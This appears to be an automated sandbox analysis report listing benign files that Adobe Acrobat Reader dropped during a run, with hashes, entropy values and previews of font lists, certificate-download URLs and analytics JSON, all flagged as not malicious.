                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):192
                                                                                    Entropy (8bit):2.7360682398396405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:kkFklliU+NvfllXlE/HT8kHJtNNX8RolJuRdxLlGB9lQRYwpDdt:kKzUyQT8kRNMa8RdWBwRd
                                                                                    MD5:9F04DC6F8B19959496F3D5AB6DD0C24B
                                                                                    SHA1:2EB50D82A36B7AD9201709AB57C2ABA8F9A2A219
                                                                                    SHA-256:F77B740AEBEF3488D6F3815BF5C1A34FE4AFDF81F25C727852B06B2B3DBA8C9B
                                                                                    SHA-512:1D1FE188336095E043F92C9C88240430270110E333A233E1C505C8299F6A588719C5770B69574519DE4998A269951B1EC88F555259B34DD33D99A2CD4F1283B2
                                                                                    Malicious:false
                                                                                    Preview:p...... ..........1h.P..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):3.247897867253901
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKA99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5DImsLNkPlE99SNxAhUe/3
                                                                                    MD5:353E2EF4BB538F0C625F6516C1742420
                                                                                    SHA1:6C26C7A2EA2E2A4D541494CFCDE4B9878CDD6156
                                                                                    SHA-256:AC804A3C6C88EE20388D87C2D8634F076B51E554905D7AEBCBF67A3056625DB1
                                                                                    SHA-512:A4D115472EB0DBE344CB33A5BD26229D1E076BA55103FD6575C84D5C2F6124E88DA880BCF43979F9E2FA91D380D729D05B65FC73D759BF2CCB18F0A7424E819A
                                                                                    Malicious:false
                                                                                    Preview:p...... .........).{.P..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):1233
                                                                                    Entropy (8bit):5.233980037532449
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):1233
                                                                                    Entropy (8bit):5.233980037532449
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):10880
                                                                                    Entropy (8bit):5.214360287289079
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PostScript document text
                                                                                    Category:dropped
                                                                                    Size (bytes):10880
                                                                                    Entropy (8bit):5.214360287289079
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                    Malicious:false
                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):243196
                                                                                    Entropy (8bit):3.3450692389394283
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                                                    MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                                                    SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                                                    SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                                                    SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                                                    Malicious:false
                                                                                    Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):295
                                                                                    Entropy (8bit):5.360905899253092
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJM3g98kUwPeUkwRe9:YvXKXBcDZc0vAGMbLUkee9
                                                                                    MD5:D79DB94465C0C0A712F3FC76271AD188
                                                                                    SHA1:CC4BD6B5233DFB338F0B777231B810CAA07FEDF3
                                                                                    SHA-256:5CD02A1F76CA993051F0C51B228F911D2E03A87066B0C57953334A2F817AA647
                                                                                    SHA-512:9E9889F9EA9683FEE133C343CA0A9BDFE3BDEC735168872A10515C38AA5780442231578E6762B8015E0C192912882FDBE5102FEEA571C7DB40D34AC0FF45ED04
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):294
                                                                                    Entropy (8bit):5.312281763237924
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfBoTfXpnrPeUkwRe9:YvXKXBcDZc0vAGWTfXcUkee9
                                                                                    MD5:2AC86A871A4B7F123B643D6D6CF8A8F2
                                                                                    SHA1:9031C74E3E3618479FD31BADD6CD615FC4B5666B
                                                                                    SHA-256:114014A6E9FC463475E8EE7F0B7EDE0D074B74A77AED84E44BBE353FC0B6D02A
                                                                                    SHA-512:F1B7885E8E8717D67ADDDCEEE34DD484ACF4F9A8EBCB1EE611D20598F32B8516D936F1239C0860DF2379E82395C30E3FF68F804917FA5F97B5DE05D74558A0AE
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):294
                                                                                    Entropy (8bit):5.291479511207129
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfBD2G6UpnrPeUkwRe9:YvXKXBcDZc0vAGR22cUkee9
                                                                                    MD5:6A5BBD0DBEFCD26F115B3DB4FC893BC2
                                                                                    SHA1:9403C99E4CDFD1DDBC5ABF0BFF916177250C0315
                                                                                    SHA-256:CDFCAEAD1A46EA7D6ED3CB2160C9050340C3062A7ABD52F0843883C6F5BD2FD9
                                                                                    SHA-512:DBF1970EA17BC1F56D9F08753E6D9BB6220E705D020427FE796889DF5C0C5CDA3FDFFEF301A5E5F7A20E571298219DBF43A87402171AB2797A89C7CBEC50A5AE
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):285
                                                                                    Entropy (8bit):5.347830177831967
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfPmwrPeUkwRe9:YvXKXBcDZc0vAGH56Ukee9
                                                                                    MD5:DBEA714EEEA47F2113825754132F23A8
                                                                                    SHA1:725607283A5BC6D9155BAB6408A274BDB506EE9D
                                                                                    SHA-256:D17D7DD1CB0038C018AA0F9564393185B4E609F17D72F7E61C71FBDC51CFEEC7
                                                                                    SHA-512:297E999B15D10A906E2F1E4205E3C6218E66AB4A964B5C0AAE873A2EC263BBEFF31E5F680949CFB1E20388F834CCEB0B68C01BDAA946ABEA8E1F7DDC16284F7E
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):1123
                                                                                    Entropy (8bit):5.687928329171706
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Yv6XBcDzvdpLgE9cQx8LennAvzBvkn0RCmK8czOCCSI:YvEcPVhgy6SAFv5Ah8cv/I
                                                                                    MD5:D1603B6B75E286EFDA6B7EEC539A96E5
                                                                                    SHA1:F1EB97EEB8FE00A65152E569C0308046A25BC989
                                                                                    SHA-256:8752AEBC63C57CD5C080CEEB36C1C50FCEFEC33AAE9953677E7E27652FF1E385
                                                                                    SHA-512:41956F0460B8DF9085A032B97005180C4BF062B42758D8D1FA0B4B827E87DBA8D4C407A4B73EF5F517B402FD00DB7215B696713AF6A945C7335928B55B287E84
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):289
                                                                                    Entropy (8bit):5.291936763758813
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJf8dPeUkwRe9:YvXKXBcDZc0vAGU8Ukee9
                                                                                    MD5:662290E8702AB92D63F34BE1185EE26B
                                                                                    SHA1:59687F882BB8FA66DC7C3965E952336C0E329D31
                                                                                    SHA-256:FA18DA77910FD791A426C8EAF3493728BA44B7FD6CB832AA73FA0CDBA0FC932D
                                                                                    SHA-512:946F19DEEFF3D806EECE9AF18BDE88D8D4ED80906B209B81918FC062058B3F1308CF60F656C176DDF13051731ADA43C7E74A821CF9519F863F6A23722375ACAF
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):292
                                                                                    Entropy (8bit):5.296776466370767
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfQ1rPeUkwRe9:YvXKXBcDZc0vAGY16Ukee9
                                                                                    MD5:80E2034767EAFC7ECAC6003EB51AC1FC
                                                                                    SHA1:B556E6DB627AAF15E88DB4B2ABDF86C0336BE47E
                                                                                    SHA-256:4216BD86993B98820F920B29523DE83669EE66DBD194B231754C5B5CD5BADE45
                                                                                    SHA-512:F1BCCDB9F8144FD91B93E402D99DD0B6F7B6AAC66F640E4B095E51DCD51E6E09350B14595E82CCD1B0334C495B1876D31CBA2963EC28D67A8AFC489D41530919
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):289
                                                                                    Entropy (8bit):5.298006863988381
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfFldPeUkwRe9:YvXKXBcDZc0vAGz8Ukee9
                                                                                    MD5:63F2F0AF4C04D9CE8FA1377CAE628B07
                                                                                    SHA1:C60FEF9EA697A1B8CBD145D21679A4E790BBCCB8
                                                                                    SHA-256:195342C680CFD3C8A7D7F52F2193277226F8BB61D4FE98D0155173FC5E41186F
                                                                                    SHA-512:EE8564F77667AEC6F95A97F6D0200C55E8403C6C7E1CFA9FEC4EA1BFECB0EA35F2944A98C52D96FEB6E41902BBAF39DEEA528DB9C47394E89CEC89503F54B33B
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):295
                                                                                    Entropy (8bit):5.316344019408279
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfzdPeUkwRe9:YvXKXBcDZc0vAGb8Ukee9
                                                                                    MD5:92011072129AA1FDFF84FFC1D412BE68
                                                                                    SHA1:6DA19DCEEB858E16B8FD805FDD9B95C4B5BA09E6
                                                                                    SHA-256:C50887A072DCD67978DAB12493AC2BF6979B647149F9383A20EF9EF46568EF16
                                                                                    SHA-512:39E33FF480B4FFB84C1DF8987789DA84DA51D94983C90F32507268FB820DC2000E44E930F31B466B9F8792A27362557D3EEC61F61308AE0BBB84EAFAE5002855
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):289
                                                                                    Entropy (8bit):5.297465408578338
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfYdPeUkwRe9:YvXKXBcDZc0vAGg8Ukee9
                                                                                    MD5:67A98E29A3E299C304224CB4324F84A5
                                                                                    SHA1:D46388F4533B2D3A17441FB3DB1E4726E6147D5D
                                                                                    SHA-256:2E2E5E29EBC2D78872414121E458C0EFFB1CFB43BD1669B7A8F2F48B6470DEAE
                                                                                    SHA-512:39A8656C99516989DFEF250CE979B8FEE83E8B3A211293ED484002EE58A5D5122A62FB10B2AFF0BEDB4B72F313AA16DFAE5EDA9B70C77588D561C6208D5488ED
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):284
                                                                                    Entropy (8bit):5.2834711583128025
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJf+dPeUkwRe9:YvXKXBcDZc0vAG28Ukee9
                                                                                    MD5:43DE01CC7FC8C02970C4782DCAA0C122
                                                                                    SHA1:2D92E5F35B41B5DEB22EFA15D825CAC2BDB384D9
                                                                                    SHA-256:20D3265E993405A1E9B1E11EF9F51907E15BF3BF00A5451CD65A525B3E6FCC64
                                                                                    SHA-512:D22994D8210336DFA7FE27E8C77AA11C728062E6451E9783964341C087A9914762313B0D752FB11436959DC50A7F73526F4101C27620D41DF86F6F40D696766A
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):291
                                                                                    Entropy (8bit):5.281029926124516
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfbPtdPeUkwRe9:YvXKXBcDZc0vAGDV8Ukee9
                                                                                    MD5:0AA68C64EABF221DC131B9B806A7D32A
                                                                                    SHA1:77B853865779DC0C0BF1F8D84A1AEFF9CE2BEE22
                                                                                    SHA-256:94972346D0593CDC31AC389F60F6BC9A3C39F4835CB19E332C3BCDD39C062F00
                                                                                    SHA-512:FEEB0F61E616984025DC9105EEFEF139A6DA9017B68E2A9B451D8FD4F1FAD6500D4D15949D23E23380E2CB7B4B8C600A1EC040BA78D68F56CA66A37BA171DFE2
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):287
                                                                                    Entropy (8bit):5.286221572983783
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJf21rPeUkwRe9:YvXKXBcDZc0vAG+16Ukee9
                                                                                    MD5:95BB2D8A953373E1CD7FFAC8059E7499
                                                                                    SHA1:2EC93FB3E22702765D3613FC92C3480602520E70
                                                                                    SHA-256:5E3D2FD6B2CCC4950AE0A643544B8E3F54F88E46D691696A0869ADBD0B3F186B
                                                                                    SHA-512:562A12CD840DD962433F15E781949906C1F10D8F8C460507C942CD5182E3FBA4C32993D46FCAD2945E27645B5AED87CD1D5A6F672EE547F9E256E64C8EFD8504
                                                                                    Malicious:false
